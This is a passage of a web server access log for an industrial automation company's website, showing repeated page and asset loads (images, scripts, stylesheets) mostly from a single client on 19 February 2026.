Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10536] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10536] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:43:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:46:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:00:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.well-known/traffic-advice" [Client 66.249.82.65] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Chrome Privacy Preserving Prefetch Proxy" "-" +[19/Feb/2026:01:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 193.186.4.174] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" +[19/Feb/2026:01:00:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:00:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:00:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:01:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 72.14.201.167] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" +[19/Feb/2026:01:07:44 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:01:07:44 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:07:44 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:08:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[19/Feb/2026:01:08:49 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" 